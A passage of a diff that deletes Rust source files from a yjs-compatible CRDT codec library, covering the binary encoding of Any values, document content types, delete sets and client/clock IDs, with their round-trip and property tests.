6 => Ok(Any::False),
7 => Ok(Any::True),
8 => Ok(Any::String(reader.read_var_string()?)), // String
9 => {
let len = reader.read_var_u64()?;
let object = (0..len)
.map(|_| Self::read_key_value(reader))
.collect::<Result<Vec<_>, _>>()?;
Ok(Any::Object(object.into_iter().collect()))
} // Object
10 => {
let len = reader.read_var_u64()?;
let any = (0..len).map(|_| Self::read(reader)).collect::<Result<Vec<_>, _>>()?;
Ok(Any::Array(any))
} // Array
11 => {
let binary = reader.read_var_buffer()?;
Ok(Any::Binary(binary.to_vec()))
} // Binary
_ => Ok(Any::Undefined),
}
}
}
impl<W: CrdtWriter> CrdtWrite<W> for Any {
fn write(&self, writer: &mut W) -> JwstCodecResult {
match self {
Any::Undefined => writer.write_u8(127)?,
Any::Null => writer.write_u8(127 - 1)?,
Any::Integer(value) => {
writer.write_u8(127 - 2)?;
writer.write_var_i32(*value)?;
}
Any::Float32(value) => {
writer.write_u8(127 - 3)?;
writer.write_f32_be(value.into_inner())?;
}
Any::Float64(value) => {
writer.write_u8(127 - 4)?;
writer.write_f64_be(value.into_inner())?;
}
Any::BigInt64(value) => {
writer.write_u8(127 - 5)?;
writer.write_i64_be(*value)?;
}
Any::False => writer.write_u8(127 - 6)?,
Any::True => writer.write_u8(127 - 7)?,
Any::String(value) => {
writer.write_u8(127 - 8)?;
writer.write_var_string(value)?;
}
Any::Object(value) => {
writer.write_u8(127 - 9)?;
writer.write_var_u64(value.len() as u64)?;
for (key, value) in value {
Self::write_key_value(writer, key, value)?;
}
}
Any::Array(values) => {
writer.write_u8(127 - 10)?;
writer.write_var_u64(values.len() as u64)?;
for value in values {
value.write(writer)?;
}
}
Any::Binary(value) => {
writer.write_u8(127 - 11)?;
writer.write_var_buffer(value)?;
}
}
Ok(())
}
}
impl Any {
fn read_key_value<R: CrdtReader>(reader: &mut R) -> JwstCodecResult<(String, Any)> {
let key = reader.read_var_string()?;
let value = Self::read(reader)?;
Ok((key, value))
}
fn write_key_value<W: CrdtWriter>(writer: &mut W, key: &str, value: &Any) -> JwstCodecResult {
writer.write_var_string(key)?;
value.write(writer)?;
Ok(())
}
pub(crate) fn read_multiple<R: CrdtReader>(reader: &mut R) -> JwstCodecResult<Vec<Any>> {
let len = reader.read_var_u64()? as usize;
let mut vec = Vec::with_capacity(len);
for _ in 0..len {
vec.push(Any::read(reader)?);
}
Ok(vec)
}
pub(crate) fn write_multiple<W: CrdtWriter>(writer: &mut W, any: &[Any]) -> JwstCodecResult {
writer.write_var_u64(any.len() as u64)?;
for value in any {
value.write(writer)?;
}
Ok(())
}
}
macro_rules! impl_primitive_from {
(unsigned, $($ty: ty),*) => {
$(
impl From<$ty> for Any {
fn from(value: $ty) -> Self {
// INFO: i64::MAX > value > u64::MAX will cut down
// yjs binary does not consider the case that the int size exceeds i64
let int: i64 = value as i64;
// handle the behavior same as yjs
if JS_INT_RANGE.contains(&int) {
if int <= i32::MAX as i64 {
Self::Integer(int as i32)
} else if int as f32 as i64 == int {
Self::Float32((int as f32).into())
} else {
Self::Float64((int as f64).into())
}
} else {
Self::BigInt64(int)
}
}
}
)*
};
(signed, $($ty: ty),*) => {
$(
impl From<$ty> for Any {
fn from(value: $ty) -> Self {
let int: i64 = value.into();
// handle the behavior same as yjs
if JS_INT_RANGE.contains(&int) {
if int <= i32::MAX as i64 {
Self::Integer(int as i32)
} else if int as f32 as i64 == int {
Self::Float32((int as f32).into())
} else {
Self::Float64((int as f64).into())
}
} else {
Self::BigInt64(int)
}
}
}
)*
};
(string, $($ty: ty),*) => {
$(
impl From<$ty> for Any {
fn from(value: $ty) -> Self {
Self::String(value.into())
}
}
)*
};
}
impl_primitive_from!(unsigned, u8, u16, u32, u64);
impl_primitive_from!(signed, i8, i16, i32, i64);
impl_primitive_from!(string, String, &str);
impl From<usize> for Any {
fn from(value: usize) -> Self {
(value as u64).into()
}
}
impl From<isize> for Any {
fn from(value: isize) -> Self {
(value as i64).into()
}
}
impl From<f32> for Any {
fn from(value: f32) -> Self {
Self::Float32(value.into())
}
}
impl From<f64> for Any {
fn from(value: f64) -> Self {
if value.trunc() == value {
(value as i64).into()
} else if value as f32 as f64 == value {
Self::Float32((value as f32).into())
} else {
Self::Float64(value.into())
}
}
}
impl From<bool> for Any {
fn from(value: bool) -> Self {
if value { Self::True } else { Self::False }
}
}
impl TryFrom<Any> for String {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::String(s) => Ok(s),
_ => Err(JwstCodecError::UnexpectedType("String")),
}
}
}
impl TryFrom<Any> for HashMap<String, Any> {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::Object(map) => Ok(map),
_ => Err(JwstCodecError::UnexpectedType("Object")),
}
}
}
impl TryFrom<Any> for Vec<Any> {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::Array(vec) => Ok(vec),
_ => Err(JwstCodecError::UnexpectedType("Array")),
}
}
}
impl TryFrom<Any> for bool {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::True => Ok(true),
Any::False => Ok(false),
_ => Err(JwstCodecError::UnexpectedType("Boolean")),
}
}
}
impl FromIterator<Any> for Any {
fn from_iter<I: IntoIterator<Item = Any>>(iter: I) -> Self {
Self::Array(iter.into_iter().collect())
}
}
impl<'a> FromIterator<&'a Any> for Any {
fn from_iter<I: IntoIterator<Item = &'a Any>>(iter: I) -> Self {
Self::Array(iter.into_iter().cloned().collect())
}
}
impl FromIterator<(String, Any)> for Any {
fn from_iter<I: IntoIterator<Item = (String, Any)>>(iter: I) -> Self {
let mut map = HashMap::new();
map.extend(iter);
Self::Object(map)
}
}
impl From<HashMap<String, Any>> for Any {
fn from(value: HashMap<String, Any>) -> Self {
Self::Object(value)
}
}
impl From<Vec<u8>> for Any {
fn from(value: Vec<u8>) -> Self {
Self::Binary(value)
}
}
impl From<&[u8]> for Any {
fn from(value: &[u8]) -> Self {
Self::Binary(value.into())
}
}
// TODO: impl for Any::Undefined
impl<T: Into<Any>> From<Option<T>> for Any {
fn from(value: Option<T>) -> Self {
if let Some(val) = value { val.into() } else { Any::Null }
}
}
#[cfg(feature = "serde_json")]
impl From<serde_json::Value> for Any {
fn from(value: serde_json::Value) -> Self {
match value {
serde_json::Value::Null => Self::Null,
serde_json::Value::Bool(b) => {
if b {
Self::True
} else {
Self::False
}
}
serde_json::Value::Number(n) => {
if n.is_f64() {
Self::Float64(n.as_f64().unwrap().into())
} else if n.is_i64() {
Self::Integer(n.as_i64().unwrap() as i32)
} else {
Self::Integer(n.as_u64().unwrap() as i32)
}
}
serde_json::Value::String(s) => Self::String(s),
serde_json::Value::Array(vec) => Self::Array(vec.into_iter().map(|v| v.into()).collect::<Vec<_>>()),
serde_json::Value::Object(obj) => Self::Object(obj.into_iter().map(|(k, v)| (k, v.into())).collect()),
}
}
}
impl<'de> serde::Deserialize<'de> for Any {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: serde::Deserializer<'de>,
{
use serde::de::{Error, MapAccess, SeqAccess, Visitor};
struct ValueVisitor;
impl<'de> Visitor<'de> for ValueVisitor {
type Value = Any;
fn expecting(&self, formatter: &mut fmt::Formatter) -> fmt::Result {
formatter.write_str("any valid JSON value")
}
#[inline]
fn visit_bool<E>(self, value: bool) -> Result<Any, E> {
Ok(if value { Any::True } else { Any::False })
}
#[inline]
fn visit_i64<E>(self, value: i64) -> Result<Any, E> {
Ok(Any::BigInt64(value))
}
#[inline]
fn visit_u64<E>(self, value: u64) -> Result<Any, E> {
Ok((value as i64).into())
}
#[inline]
fn visit_f64<E>(self, value: f64) -> Result<Any, E> {
Ok(Any::Float64(OrderedFloat(value)))
}
#[inline]
fn visit_str<E>(self, value: &str) -> Result<Any, E>
where
E: Error,
{
self.visit_string(String::from(value))
}
#[inline]
fn visit_string<E>(self, value: String) -> Result<Any, E> {
Ok(Any::String(value))
}
#[inline]
fn visit_none<E>(self) -> Result<Any, E> {
Ok(Any::Null)
}
#[inline]
fn visit_some<D>(self, deserializer: D) -> Result<Any, D::Error>
where
D: serde::Deserializer<'de>,
{
serde::Deserialize::deserialize(deserializer)
}
#[inline]
fn visit_unit<E>(self) -> Result<Any, E> {
Ok(Any::Null)
}
#[inline]
fn visit_seq<V>(self, mut visitor: V) -> Result<Any, V::Error>
where
V: SeqAccess<'de>,
{
let mut vec = Vec::new();
while let Some(elem) = visitor.next_element()? {
vec.push(elem);
}
Ok(Any::Array(vec))
}
fn visit_map<V>(self, mut visitor: V) -> Result<Any, V::Error>
where
V: MapAccess<'de>,
{
match visitor.next_key::<String>()? {
Some(k) => {
let mut values = HashMap::new();
values.insert(k, visitor.next_value()?);
while let Some((key, value)) = visitor.next_entry()? {
values.insert(key, value);
}
Ok(Any::Object(values))
}
None => Ok(Any::Object(HashMap::new())),
}
}
}
deserializer.deserialize_any(ValueVisitor)
}
}
impl serde::Serialize for Any {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: serde::Serializer,
{
use serde::ser::{SerializeMap, SerializeSeq};
match self {
Any::Null => serializer.serialize_none(),
Any::Undefined => serializer.serialize_none(),
Any::True => serializer.serialize_bool(true),
Any::False => serializer.serialize_bool(false),
Any::Float32(value) => serializer.serialize_f32(value.0),
Any::Float64(value) => serializer.serialize_f64(value.0),
Any::Integer(value) => serializer.serialize_i32(*value),
Any::BigInt64(value) => serializer.serialize_i64(*value),
Any::String(value) => serializer.serialize_str(value.as_ref()),
Any::Array(values) => {
let mut seq = serializer.serialize_seq(Some(values.len()))?;
for value in values.iter() {
seq.serialize_element(value)?;
}
seq.end()
}
Any::Object(entries) => {
let mut map = serializer.serialize_map(Some(entries.len()))?;
for (key, value) in entries.iter() {
map.serialize_entry(key, value)?;
}
map.end()
}
Any::Binary(buf) => serializer.serialize_bytes(buf),
}
}
}
impl Display for Any {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
Self::True => write!(f, "true"),
Self::False => write!(f, "false"),
Self::String(s) => write!(f, "\"{s}\""),
Self::Integer(i) => write!(f, "{i}"),
Self::Float32(v) => write!(f, "{v}"),
Self::Float64(v) => write!(f, "{v}"),
Self::BigInt64(v) => write!(f, "{v}"),
Self::Object(map) => {
write!(f, "{{")?;
for (i, (key, value)) in map.iter().enumerate() {
if i > 0 {
write!(f, ", ")?;
}
write!(f, "{key}: {value}")?;
}
write!(f, "}}")
}
Self::Array(vec) => {
write!(f, "[")?;
for (i, value) in vec.iter().enumerate() {
if i > 0 {
write!(f, ", ")?;
}
write!(f, "{value}")?;
}
write!(f, "]")
}
Self::Binary(buf) => write!(f, "{buf:?}"),
Self::Undefined => write!(f, "undefined"),
Self::Null => write!(f, "null"),
}
}
}
#[cfg(test)]
mod tests {
use proptest::{collection::vec, prelude::*};
use super::*;
#[test]
fn test_any_codec() {
let any = Any::Object(
vec![
("name".to_string(), Any::String("Alice".to_string())),
("age".to_string(), Any::Integer(25)),
(
"contacts".to_string(),
Any::Array(vec![
Any::Object(
vec![
("type".to_string(), Any::String("Mobile".to_string())),
("number".to_string(), Any::String("1234567890".to_string())),
]
.into_iter()
.collect(),
),
Any::Object(
vec![
("type".to_string(), Any::String("Email".to_string())),
("address".to_string(), Any::String("alice@example.com".to_string())),
]
.into_iter()
.collect(),
),
Any::Undefined,
]),
),
(
"standard_data".to_string(),
Any::Array(vec![
Any::Undefined,
Any::Null,
Any::Integer(114514),
Any::Float32(114.514.into()),
Any::Float64(115.514.into()),
Any::BigInt64(-1145141919810),
Any::False,
Any::True,
Any::Object(
vec![
("name".to_string(), Any::String("tadokoro".to_string())),
("age".to_string(), Any::String("24".to_string())),
("profession".to_string(), Any::String("student".to_string())),
]
.into_iter()
.collect(),
),
Any::Binary(vec![1, 2, 3, 4, 5]),
]),
),
]
.into_iter()
.collect(),
);
let mut encoder = RawEncoder::default();
any.write(&mut encoder).unwrap();
let encoded = encoder.into_inner();
let mut decoder = RawDecoder::new(&encoded);
let decoded = Any::read(&mut decoder).unwrap();
assert_eq!(any, decoded);
}
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_any(any in vec(any::<Any>(), 0..100)) {
for any in &any {
let mut encoder = RawEncoder::default();
any.write(&mut encoder).unwrap();
let encoded = encoder.into_inner();
let mut decoder = RawDecoder::new(&encoded);
let decoded = Any::read(&mut decoder).unwrap();
assert_eq!(any, &decoded);
}
}
}
#[test]
fn test_convert_to_any() {
let any: Vec<Any> = vec![
42u8.into(),
42u16.into(),
42u32.into(),
42u64.into(),
114.514f32.into(),
1919.810f64.into(),
(-42i8).into(),
(-42i16).into(),
(-42i32).into(),
(-42i64).into(),
false.into(),
true.into(),
"JWST".to_string().into(),
"OctoBase".into(),
vec![1u8, 9, 1, 9].into(),
(&[8u8, 1, 0][..]).into(),
[Any::True, 42u8.into()].iter().collect(),
];
assert_eq!(
any,
vec![
Any::Integer(42),
Any::Integer(42),
Any::Integer(42),
Any::Integer(42),
Any::Float32(114.514.into()),
Any::Float64(1919.810.into()),
Any::Integer(-42),
Any::Integer(-42),
Any::Integer(-42),
Any::Integer(-42),
Any::False,
Any::True,
Any::String("JWST".to_string()),
Any::String("OctoBase".to_string()),
Any::Binary(vec![1, 9, 1, 9]),
Any::Binary(vec![8, 1, 0]),
Any::Array(vec![Any::True, Any::Integer(42)])
]
);
assert_eq!(
vec![("key".to_string(), 10u64.into())].into_iter().collect::<Any>(),
Any::Object(HashMap::from_iter(vec![("key".to_string(), Any::Integer(10))]))
);
let any: Any = 10u64.into();
assert_eq!([any].iter().collect::<Any>(), Any::Array(vec![Any::Integer(10)]));
}
}
@@ -1,384 +0,0 @@
use super::*;
#[derive(Clone)]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub(crate) enum Content {
Deleted(u64),
Json(Vec<Option<String>>),
Binary(Vec<u8>),
String(String),
#[cfg_attr(test, proptest(skip))]
Embed(Any),
#[cfg_attr(test, proptest(skip))]
Format {
key: String,
value: Any,
},
#[cfg_attr(test, proptest(skip))]
Type(YTypeRef),
Any(Vec<Any>),
Doc {
guid: String,
opts: Any,
},
}
unsafe impl Send for Content {}
unsafe impl Sync for Content {}
impl From<Any> for Content {
fn from(value: Any) -> Self {
match value {
Any::Undefined
| Any::Null
| Any::Integer(_)
| Any::Float32(_)
| Any::Float64(_)
| Any::BigInt64(_)
| Any::False
| Any::True
| Any::String(_)
| Any::Object(_) => Content::Any(vec![value; 1]),
Any::Array(v) => Content::Any(v),
Any::Binary(b) => Content::Binary(b),
}
}
}
impl PartialEq for Content {
fn eq(&self, other: &Self) -> bool {
match (self, other) {
(Self::Deleted(len1), Self::Deleted(len2)) => len1 == len2,
(Self::Json(vec1), Self::Json(vec2)) => vec1 == vec2,
(Self::Binary(vec1), Self::Binary(vec2)) => vec1 == vec2,
(Self::String(str1), Self::String(str2)) => str1 == str2,
(Self::Embed(json1), Self::Embed(json2)) => json1 == json2,
(
Self::Format {
key: key1,
value: value1,
},
Self::Format {
key: key2,
value: value2,
},
) => key1 == key2 && value1 == value2,
(Self::Any(any1), Self::Any(any2)) => any1 == any2,
(Self::Doc { guid: guid1, .. }, Self::Doc { guid: guid2, .. }) => guid1 == guid2,
(Self::Type(ty1), Self::Type(ty2)) => ty1 == ty2,
_ => false,
}
}
}
impl std::fmt::Debug for Content {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Deleted(arg0) => f.debug_tuple("Deleted").field(arg0).finish(),
Self::Json(arg0) => f
.debug_tuple("JSON")
.field(&format!("Vec [len: {}]", arg0.len()))
.finish(),
Self::Binary(arg0) => f
.debug_tuple("Binary")
.field(&format!("Binary [len: {}]", arg0.len()))
.finish(),
Self::String(arg0) => f.debug_tuple("String").field(arg0).finish(),
Self::Embed(arg0) => f.debug_tuple("Embed").field(arg0).finish(),
Self::Format { key, value } => f
.debug_struct("Format")
.field("key", key)
.field("value", value)
.finish(),
Self::Type(arg0) => f.debug_tuple("Type").field(&arg0.ty().unwrap().kind()).finish(),
Self::Any(arg0) => f.debug_tuple("Any").field(arg0).finish(),
Self::Doc { guid, opts } => f.debug_struct("Doc").field("guid", guid).field("opts", opts).finish(),
}
}
}
impl Content {
pub(crate) fn read<R: CrdtReader>(decoder: &mut R, tag_type: u8) -> JwstCodecResult<Self> {
match tag_type {
1 => Ok(Self::Deleted(decoder.read_var_u64()?)), // Deleted
2 => {
let len = decoder.read_var_u64()?;
let strings = (0..len)
.map(|_| decoder.read_var_string().map(|s| (s != "undefined").then_some(s)))
.collect::<Result<Vec<_>, _>>()?;
Ok(Self::Json(strings))
} // JSON
3 => Ok(Self::Binary(decoder.read_var_buffer()?.to_vec())), // Binary
4 => Ok(Self::String(decoder.read_var_string()?)), // String
5 => {
let string = decoder.read_var_string()?;
let json = serde_json::from_str(&string).map_err(|_| JwstCodecError::DamagedDocumentJson)?;
Ok(Self::Embed(json))
} // Embed
6 => {
let key = decoder.read_var_string()?;
let value = decoder.read_var_string()?;
let value = serde_json::from_str(&value).map_err(|_| JwstCodecError::DamagedDocumentJson)?;
Ok(Self::Format { key, value })
} // Format
7 => {
let type_ref = decoder.read_var_u64()?;
let kind = YTypeKind::from(type_ref);
let tag_name = match kind {
YTypeKind::XMLElement | YTypeKind::XMLHook => Some(decoder.read_var_string()?),
YTypeKind::Unknown => {
return Err(JwstCodecError::IncompleteDocument(format!(
"Unknown y type: {type_ref}"
)));
}
_ => None,
};
Ok(Self::Type(YTypeRef::new(kind, tag_name)))
} // YType
8 => Ok(Self::Any(Any::read_multiple(decoder)?)), // Any
9 => {
let guid = decoder.read_var_string()?;
let opts = Any::read(decoder)?;
Ok(Self::Doc { guid, opts })
} // Doc
tag_type => Err(JwstCodecError::IncompleteDocument(format!(
"Unknown content type: {tag_type}"
))),
}
}
pub(crate) fn get_info(&self) -> u8 {
match self {
Self::Deleted(_) => 1,
Self::Json(_) => 2,
Self::Binary(_) => 3,
Self::String(_) => 4,
Self::Embed(_) => 5,
Self::Format { .. } => 6,
Self::Type(_) => 7,
Self::Any(_) => 8,
Self::Doc { .. } => 9,
}
}
pub(crate) fn write<W: CrdtWriter>(&self, encoder: &mut W) -> JwstCodecResult {
match self {
Self::Deleted(len) => {
encoder.write_var_u64(*len)?;
}
Self::Json(strings) => {
encoder.write_var_u64(strings.len() as u64)?;
for string in strings {
match string {
Some(string) => encoder.write_var_string(string)?,
None => encoder.write_var_string("undefined")?,
}
}
}
Self::Binary(buffer) => {
encoder.write_var_buffer(buffer)?;
}
Self::String(string) => {
encoder.write_var_string(string)?;
}
Self::Embed(val) => {
encoder.write_var_string(serde_json::to_string(val).map_err(|_| JwstCodecError::DamagedDocumentJson)?)?;
}
Self::Format { key, value } => {
encoder.write_var_string(key)?;
encoder.write_var_string(serde_json::to_string(value).map_err(|_| JwstCodecError::DamagedDocumentJson)?)?;
}
Self::Type(ty) => {
if let Some(ty) = ty.ty() {
let type_ref = u64::from(ty.kind());
encoder.write_var_u64(type_ref)?;
if matches!(ty.kind(), YTypeKind::XMLElement | YTypeKind::XMLHook) {
encoder.write_var_string(ty.name.as_ref().unwrap())?;
}
}
}
Self::Any(any) => {
Any::write_multiple(encoder, any)?;
}
Self::Doc { guid, opts } => {
encoder.write_var_string(guid)?;
opts.write(encoder)?;
}
}
Ok(())
}
pub fn clock_len(&self) -> u64 {
match self {
Self::Deleted(len) => *len,
Self::Json(strings) => strings.len() as u64,
// TODO: need a custom wrapper with length cached, this cost too much
Self::String(string) => string.chars().map(|c| c.len_utf16()).sum::<usize>() as u64,
Self::Any(any) => any.len() as u64,
Self::Binary(_) | Self::Embed(_) | Self::Format { .. } | Self::Type(_) | Self::Doc { .. } => 1,
}
}
pub fn countable(&self) -> bool {
!matches!(self, Content::Format { .. } | Content::Deleted(_))
}
#[allow(dead_code)]
pub fn splittable(&self) -> bool {
matches!(self, Self::String { .. } | Self::Any { .. } | Self::Json { .. })
}
pub fn split(&self, diff: u64) -> JwstCodecResult<(Self, Self)> {
match self {
Self::String(str) => {
let (left, right) = Self::split_as_utf16_str(str.as_str(), diff);
Ok((Self::String(left.to_string()), Self::String(right.to_string())))
}
Self::Json(vec) => {
let (left, right) = vec.split_at(diff as usize);
Ok((Self::Json(left.to_owned()), Self::Json(right.to_owned())))
}
Self::Any(vec) => {
let (left, right) = vec.split_at(diff as usize);
Ok((Self::Any(left.to_owned()), Self::Any(right.to_owned())))
}
Self::Deleted(len) => {
let (left, right) = (diff, *len - diff);
Ok((Self::Deleted(left), Self::Deleted(right)))
}
_ => Err(JwstCodecError::ContentSplitNotSupport(diff)),
}
}
/// consider `offset` as a utf-16 encoded string offset
fn split_as_utf16_str(s: &str, offset: u64) -> (&str, &str) {
let mut utf_16_offset = 0;
let mut utf_8_offset = 0;
for ch in s.chars() {
utf_16_offset += ch.len_utf16();
utf_8_offset += ch.len_utf8();
if utf_16_offset as u64 >= offset {
break;
}
}
s.split_at(utf_8_offset)
}
}
#[cfg(test)]
mod tests {
use proptest::{collection::vec, prelude::*};
use super::*;
fn content_round_trip(content: &Content) -> JwstCodecResult {
let mut writer = RawEncoder::default();
writer.write_u8(content.get_info())?;
content.write(&mut writer)?;
let update = writer.into_inner();
let mut reader = RawDecoder::new(&update);
let tag_type = reader.read_u8()?;
let decoded = Content::read(&mut reader, tag_type)?;
match (&decoded, content) {
(Content::Type(decoded_ty), Content::Type(original_ty)) => {
let decoded_ty = decoded_ty.ty().expect("decoded ytype must exist");
let original_ty = original_ty.ty().expect("original ytype must exist");
assert_eq!(decoded_ty.kind(), original_ty.kind());
assert_eq!(decoded_ty.name.as_deref(), original_ty.name.as_deref());
}
_ => assert_eq!(decoded, *content),
}
Ok(())
}
#[test]
fn test_content() {
loom_model!({
let contents = [
Content::Deleted(42),
Content::Json(vec![None, Some("test_1".to_string()), Some("test_2".to_string())]),
Content::Binary(vec![1, 2, 3]),
Content::String("hello".to_string()),
Content::Embed(Any::True),
Content::Format {
key: "key".to_string(),
value: Any::Integer(42),
},
Content::Type(YTypeRef::new(YTypeKind::Array, None)),
Content::Type(YTypeRef::new(YTypeKind::Map, None)),
Content::Type(YTypeRef::new(YTypeKind::Text, None)),
Content::Type(YTypeRef::new(YTypeKind::XMLElement, Some("test".to_string()))),
Content::Type(YTypeRef::new(YTypeKind::XMLFragment, None)),
Content::Type(YTypeRef::new(YTypeKind::XMLHook, Some("test".to_string()))),
Content::Type(YTypeRef::new(YTypeKind::XMLText, None)),
Content::Any(vec![Any::BigInt64(42), Any::String("Test Any".to_string())]),
Content::Doc {
guid: "my_guid".to_string(),
opts: Any::BigInt64(42),
},
];
for content in &contents {
content_round_trip(content).unwrap();
}
});
}
#[test]
fn test_content_split() {
let contents = [
Content::String("hello".to_string()),
Content::Json(vec![None, Some("test_1".to_string()), Some("test_2".to_string())]),
Content::Any(vec![Any::BigInt64(42), Any::String("Test Any".to_string())]),
Content::Binary(vec![]),
];
{
let (left, right) = contents[0].split(1).unwrap();
assert!(contents[0].splittable());
assert_eq!(left, Content::String("h".to_string()));
assert_eq!(right, Content::String("ello".to_string()));
}
{
let (left, right) = contents[1].split(1).unwrap();
assert!(contents[1].splittable());
assert_eq!(left, Content::Json(vec![None]));
assert_eq!(
right,
Content::Json(vec![Some("test_1".to_string()), Some("test_2".to_string())])
);
}
{
let (left, right) = contents[2].split(1).unwrap();
assert!(contents[2].splittable());
assert_eq!(left, Content::Any(vec![Any::BigInt64(42)]));
assert_eq!(right, Content::Any(vec![Any::String("Test Any".to_string())]));
}
{
assert!(!contents[3].splittable());
assert_eq!(contents[3].split(2), Err(JwstCodecError::ContentSplitNotSupport(2)));
}
}
proptest! {
#[test]
#[cfg_attr(miri, ignore)]
fn test_random_content(contents in vec(any::<Content>(), 0..10)) {
for content in &contents {
content_round_trip(content).unwrap();
}
}
}
}
@@ -1,227 +0,0 @@
use std::{
collections::{VecDeque, hash_map::Entry},
ops::{Deref, DerefMut, Range},
};
use super::*;
use crate::doc::OrderRange;
impl<R: CrdtReader> CrdtRead<R> for Range<u64> {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let clock = decoder.read_var_u64()?;
let len = decoder.read_var_u64()?;
Ok(clock..clock + len)
}
}
impl<W: CrdtWriter> CrdtWrite<W> for Range<u64> {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.start)?;
encoder.write_var_u64(self.end - self.start)?;
Ok(())
}
}
impl<R: CrdtReader> CrdtRead<R> for OrderRange {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let num_of_deletes = decoder.read_var_u64()? as usize;
if num_of_deletes == 1 {
Ok(OrderRange::Range(Range::<u64>::read(decoder)?))
} else {
let mut deletes = VecDeque::with_capacity(num_of_deletes);
for _ in 0..num_of_deletes {
deletes.push_back(Range::<u64>::read(decoder)?);
}
Ok(OrderRange::Fragment(deletes))
}
}
}
impl<W: CrdtWriter> CrdtWrite<W> for OrderRange {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
match self {
OrderRange::Range(range) => {
encoder.write_var_u64(1)?;
range.write(encoder)?;
}
OrderRange::Fragment(ranges) => {
encoder.write_var_u64(ranges.len() as u64)?;
for range in ranges {
range.write(encoder)?;
}
}
}
Ok(())
}
}
#[derive(Debug, Default, Clone, PartialEq)]
pub struct DeleteSet(pub ClientMap<OrderRange>);
impl Deref for DeleteSet {
type Target = ClientMap<OrderRange>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl<const N: usize> From<[(Client, Vec<Range<u64>>); N]> for DeleteSet {
fn from(value: [(Client, Vec<Range<u64>>); N]) -> Self {
let mut map = ClientMap::with_capacity(N);
for (client, ranges) in value {
map.insert(client, ranges.into());
}
Self(map)
}
}
impl DerefMut for DeleteSet {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl DeleteSet {
pub fn add(&mut self, client: Client, from: Clock, len: Clock) {
self.add_range(client, from..from + len);
}
pub fn add_range(&mut self, client: Client, range: Range<u64>) {
match self.0.entry(client) {
Entry::Occupied(e) => {
let r = e.into_mut();
if r.is_empty() {
*r = range.into();
} else {
r.push(range);
}
}
Entry::Vacant(e) => {
e.insert(range.into());
}
}
}
pub fn batch_add_ranges(&mut self, client: Client, ranges: Vec<Range<u64>>) {
match self.0.entry(client) {
Entry::Occupied(e) => {
e.into_mut().extend(ranges);
}
Entry::Vacant(e) => {
e.insert(ranges.into());
}
}
}
pub fn merge(&mut self, other: &Self) {
for (client, range) in &other.0 {
match self.0.entry(*client) {
Entry::Occupied(e) => {
e.into_mut().merge(range.clone());
}
Entry::Vacant(e) => {
e.insert(range.clone());
}
}
}
}
}
impl<R: CrdtReader> CrdtRead<R> for DeleteSet {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let num_of_clients = decoder.read_var_u64()? as usize;
// See: [HASHMAP_SAFE_CAPACITY]
let mut map = ClientMap::with_capacity(num_of_clients.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..num_of_clients {
let client = decoder.read_var_u64()?;
let deletes = OrderRange::read(decoder)?;
map.insert(client, deletes);
}
map.shrink_to_fit();
Ok(DeleteSet(map))
}
}
impl<W: CrdtWriter> CrdtWrite<W> for DeleteSet {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.len() as u64)?;
let mut clients = self.keys().copied().collect::<Vec<_>>();
// Descending
clients.sort_by(|a, b| b.cmp(a));
for client in clients {
encoder.write_var_u64(client)?;
self.get(&client).unwrap().write(encoder)?;
}
Ok(())
}
}
#[cfg(test)]
#[allow(clippy::single_range_in_vec_init)]
mod tests {
use super::*;
#[test]
fn test_delete_set_add() {
let delete_set = DeleteSet::from([
(1, vec![0..10, 20..30]),
(2, vec![0..5, 10..20]),
(3, vec![15..20, 30..35]),
(4, vec![0..10]),
]);
{
let mut delete_set = delete_set.clone();
delete_set.add(1, 5, 25);
assert_eq!(delete_set.get(&1), Some(&OrderRange::Range(0..30)));
}
{
let mut delete_set = delete_set;
delete_set.add(1, 5, 10);
assert_eq!(delete_set.get(&1), Some(&OrderRange::from(vec![0..15, 20..30])));
}
}
#[test]
fn test_delete_set_batch_push() {
let delete_set = DeleteSet::from([
(1, vec![0..10, 20..30]),
(2, vec![0..5, 10..20]),
(3, vec![15..20, 30..35]),
(4, vec![0..10]),
]);
{
let mut delete_set = delete_set.clone();
delete_set.batch_add_ranges(1, vec![0..5, 10..20]);
assert_eq!(delete_set.get(&1), Some(&OrderRange::Range(0..30)));
}
{
let mut delete_set = delete_set;
delete_set.batch_add_ranges(1, vec![40..50, 10..20]);
assert_eq!(delete_set.get(&1), Some(&OrderRange::from(vec![0..30, 40..50])));
}
}
#[test]
fn test_encode_decode() {
let delete_set = DeleteSet::from([(1, vec![0..10, 20..30]), (2, vec![0..5, 10..20])]);
let mut encoder = RawEncoder::default();
delete_set.write(&mut encoder).unwrap();
let update = encoder.into_inner();
let mut decoder = RawDecoder::new(&update);
let decoded = DeleteSet::read(&mut decoder).unwrap();
assert_eq!(delete_set, decoded);
}
}
@@ -1,68 +0,0 @@
use std::{
fmt::Display,
hash::Hash,
ops::{Add, Sub},
};
pub type Client = u64;
pub type Clock = u64;
#[derive(Debug, Copy, Clone, PartialEq, Eq, Hash, Default)]
#[cfg_attr(fuzzing, derive(arbitrary::Arbitrary))]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub struct Id {
pub client: Client,
pub clock: Clock,
}
impl Id {
pub fn new(client: Client, clock: Clock) -> Self {
Self { client, clock }
}
}
impl From<(Client, Clock)> for Id {
fn from((client, clock): (Client, Clock)) -> Self {
